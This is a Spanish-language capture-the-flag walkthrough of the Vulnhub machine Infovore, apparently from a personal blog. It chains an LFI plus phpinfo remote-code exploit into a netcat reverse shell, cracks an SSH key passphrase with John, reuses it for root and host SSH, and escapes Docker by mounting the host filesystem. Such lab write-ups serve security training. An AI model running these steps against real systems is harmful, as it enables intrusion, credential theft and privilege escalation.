[VLN] Infovore

Hoy vamos a hackear la maquina de Vulnhub llamada Infovore. Podeis descargarla desde el siguiente enlace: Infovore

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos. 

sml@Cassandra:~$ nmap -A -p- 192.168.1.27
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-28 22:24 CEST
Nmap scan report for infovore.home (192.168.1.27)
Host is up (0.00039s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Include me ...

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.00 seconds
Vemos que solo tiene el puerto 80 abierto, asi que lo investigamos un poco mas. 

sml@Cassandra:~$ gobuster dir -u http://192.168.1.27 -w 
/usr/share/wordlists/dirb/big.txt -x php,html,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.27
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,php,html
[+] Timeout:        10s
===============================================================
2020/06/28 22:28:06 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/css (Status: 301)
/img (Status: 301)
/index.php (Status: 200)
/index.html (Status: 200)
/info.php (Status: 200)
/server-status (Status: 403)
/vendor (Status: 301)
===============================================================
2020/06/28 22:28:29 Finished
===============================================================
Entre otras cosas, encontramos el fichero info.php que nos muestra la tipica salida de phpinfo(), y por otro lado el fichero index.php Vamos a ver si index.php acepta algun parametro... 

sml@Cassandra:~/tools/parameth$ python parameth.py  -u 
http://192.168.1.27/index.php
                                       |   |
  __ \   _` |  __| _` | __ `__ \   _ \ __| __ \
  |   | (   | |   (   | |   |   |  __/ |   | | |
  .__/ \__,_|_|  \__,_|_|  _|  _|\___|\__|_| |_|
  _|
parameth v1.337 - find parameters and craic rocks
Author: Ciaran McNally - https://securit.ie/
================================================
Establishing base figures...
POST data: 
Offset value: 0
GET: content-length-> 4743  status-> 200
POST: content-length-> 4743  status-> 200
Scanning it like you own it...
GET(size): filename | 4743 ->80 ( 
http://192.168.1.27/index.php?filename=discobiscuits )
Vemos que acepta el parametro "filename". Tras probar, poco podemos hacer con el LFI por si solo, sin embargo hay un exploit[1] que puede servirnos, ya que reunimos todos los requisitos! :) 

sml@Cassandra:~/$ mkdir infovore
sml@Cassandra:~/$ cd infovore
sml@Cassandra:~/infovore$ wget 
https://github.com/M4LV0/LFI-phpinfo-RCE/blob/master/exploit.py
En el exploit debemos modificar, la IP, el Puerto y modificar la variable REQ1 y LFIREQ para poner nuestro info.php y nuestro parametro filename: 

REQ1="""POST /info.php?a=""".....
LFIREQ="""GET /index.php?filename=%s...
Ponemos nc a la escucha. 

sml@Cassandra:~$ nc -nlvp 3333
listening on [any] 3333 ...
Y ejecutamos el exploit. 

sml@Cassandra:~/tools$ python exploit.py 192.168.1.27 80 20

Low Shell


sml@Cassandra:~$ nc -nlvp 3333
listening on [any] 3333 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.27] 35313
Linux e71b67461f6c 3.16.0-6-amd64 #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) 
x86_64 GNU/Linux
 00:05:36 up  1:42,  0 users,  load average: 1.47, 4.48, 2.44
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash -i
www-data@e71b67461f6c:/var/www/html$
Ahora que estamos dentro exploramos un poco mas el sistema. 

www-data@e71b67461f6c:/tmp$ cat /proc/1/cgroup
---SNIP---
8:perf_event:/docker/e71b67461f6c0078a9d7d25a70c0c303b81f0fa20a9a5fab4e51c098d57
5c0a7
7:blkio:/docker/e71b67461f6c0078a9d7d25a70c0c303b81f0fa20a9a5fab4e51c098d575c0a7
6:net_cls,net_prio:/docker/e71b67461f6c0078a9d7d25a70c0c303b81f0fa20a9a5fab4e51c
098d575c0a7
5:freezer:/docker/e71b67461f6c0078a9d7d25a70c0c303b81f0fa20a9a5fab4e51c098d575c0
a7
4:devices:/docker/e71b67461f6c0078a9d7d25a70c0c303b81f0fa20a9a5fab4e51c098d575c0
a7
---SNIP---
Vemos que estamos dentro de un container :(

.user.txt


www-data@e71b67461f6c:/var/www/html$ ls -la
total 312
drwxrwxrwx 6 www-data www-data   4096 Jun 22 22:39 .
drwxr-xr-x 5 root     root       4096 Jun 22 22:39 ..
-r--r--r-- 1 root     root         42 Jun 22 21:40 .user.txt
drwxr-xr-x 2 root     root       4096 Apr 27 10:55 css
-rw-r--r-- 1 root     root       2544 Sep 16  2019 gulpfile.js
drwxr-xr-x 2 root     root       4096 Apr 27 10:55 img
-rw-r--r-- 1 root     root       4674 Sep 16  2019 index.html
-rw-r--r-- 1 root     root        416 Jun  1 12:18 index.php
-rw-r--r-- 1 root     root         19 Apr 26 14:23 info.php
-rw-r--r-- 1 root     root     262191 Sep 16  2019 package-lock.json
-rw-r--r-- 1 root     root       1319 Sep 16  2019 package.json
drwxr-xr-x 2 root     root       4096 Apr 27 10:55 scss
drwxr-xr-x 4 root     root       4096 Sep 16  2019 vendor
www-data@e71b67461f6c:/var/www/html$ cat .user.txt
FLAG{Now_You_See_phpinfo_not_so_harmless}
Hemos encontrado una flag, seguimos rebuscando por el sistema... En / encontramos un fichero llamado .oldkeys.gz Lo descomprimimos. 

www-data@e71b67461f6c:/$ cp .oldkeys.tgz /tmp
www-data@e71b67461f6c:/$ cd /tmp
www-data@e71b67461f6c:/tmp$ tar -xzvf .oldkeys.tgz
root
root.pub
Vemos que tiene una key publica y otra privada. Copiamos la key privada a nuestra maquina para ver si podemos crackear el password. 

sml@Cassandra:~/.ssh$ /usr/share/john/ssh2john.py root > root.hash
sml@Cassandra:~/.ssh$ sudo /usr/sbin/john root.hash 
--wordlist=/home/sml/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded 
hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
choclate93       (root)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:04 DONE (2020-06-29 09:45) 0.2457g/s 3523Kp/s 3523Kc/s 
3523KC/sa6_123..*7¡Vamos!
Session completed
Bien, tenemos el password, choclate93. Hacemos "su" para ver si nos sirve la password para root. 

www-data@e71b67461f6c:/$ su -P root
Password: choclate93
root@e71b67461f6c:/# id
uid=0(root) gid=0(root) groups=0(root)
Funciona :)

root.txt


root@e71b67461f6c:/tmp# cd /root
root@e71b67461f6c:~# ls
root.txt
root@e71b67461f6c:~# cat root.txt
FLAG{Congrats_on_owning_phpinfo_hope_you_enjoyed_it}
And onwards and upwards!
En el directorio de root, vemos la carpeta .ssh que contiene 2 keys. En la key publica, aparece el usuario "admin" y una IP. 

root@e71b67461f6c:~/.ssh# ls 
id_rsa
id_rsa.pub
known_hosts
root@e71b67461f6c:~/.ssh# cat id_rsa.pub
ssh-rsa 
AAAAB3NzaC1yc2EAAAADAQABAAABAQDN/keLDJowDdeSdHZz26wS1M2o2/eiJ99+acchRJr0lZE0Ymqb
foIo+n75VS+eLiT03yonunkVp+lhK+uey7/Tu8JsQSHK1F0gci5FG7MKRU4/+m+0CODwVFTNgw3E4FKg
5qu+nt6BkBThU3Vnhe/Ujbp5ruNjb4pPajll2Pv5dyRfaRrn0DTnhpBdeXWdIhU9QQgtxzmUXed/77rV
6m4AL4+iENigp3YcPOjF7zUG/NEop9c1wdGpjSEhv/ftjyKoazFEmOI1SGpD3k9VZlIUFs/uw6kRVDJl
g9uxT4Pz0tIEMVizlV4oZgcEyOJ9NkSe6ePUAHG7F+v7VjbYdbVh admin@192.168.150.1
Nos logueamos como admin en dicha IP. 

root@e71b67461f6c:/# ssh admin@192.168.150.1
Enter passphrase for key '/root/.ssh/id_rsa': choclate93

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 23 05:59:43 2020 from 192.168.150.21
admin@infovore:~$

admin.txt


admin@infovore:~$ ls
admin.txt
admin@infovore:~$ cat admin.txt
FLAG{Escaped_from_D0ck3r}
Vemos que el usuario admin pertenece al grupo docker. Miramos que imagenes tenemos. 

admin@infovore:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             
SIZE
theart42/infovore   latest              40de379c5116        6 days ago          
428MB
Ahora solo nos queda montar la raiz del sistema /, en la carpeta del container /mnt/fuckfs, y ya que seremos root del container, podremos ver todo :)

root.txt


admin@infovore:~$ docker run -v /:/mnt/fuckfs -ti 40de379c5116 /bin/bash
root@81abcd5978ad:/var/www/html# cd /mnt/fuckfs/root
root@81abcd5978ad:/mnt/fuckfs/root# ls
root.txt
root@81abcd5978ad:/mnt/fuckfs/root# cat root.txt
 _____                             _       _                                    
          
/  __ \                           | |     | |                                   
          
| /  \/ ___  _ __   __ _ _ __ __ _| |_ ___| |                                   
          
| |    / _ \| '_ \ / _` | '__/ _` | __/ __| |                                   
          
| \__/\ (_) | | | | (_| | | | (_| | |_\__ \_|                                   
          
 \____/\___/|_| |_|\__, |_|  \__,_|\__|___(_)                                   
          
                    __/ |                                                       
          
                   |___/                                                        
          
__   __                                         _   _        __                 
        _ 
\ \ / /                                        | | (_)      / _|                
       | |
 \ V /___  _   _   _ ____      ___ __   ___  __| |  _ _ __ | |_ _____   _____  
_ __ ___| |
  \ // _ \| | | | | '_ \ \ /\ / / '_ \ / _ \/ _` | | | '_ \|  _/ _ \ \ / / _ \| 
'__/ _ \ |
  | | (_) | |_| | | |_) \ V  V /| | | |  __/ (_| | | | | | | || (_) \ V / (_) | 
| |  __/_|
  \_/\___/ \__,_| | .__/ \_/\_/ |_| |_|\___|\__,_| |_|_| |_|_| \___/ \_/ 
\___/|_|  \___(_)
                  | |                                                           
          
                  |_|                                                           
          
 
FLAG{And_now_You_are_done}

@theart42 and @4nqr34z

End

Y con esto ya seriamos root de la maquina :) [1] https://github.com/M4LV0/LFI-phpinfo-RCE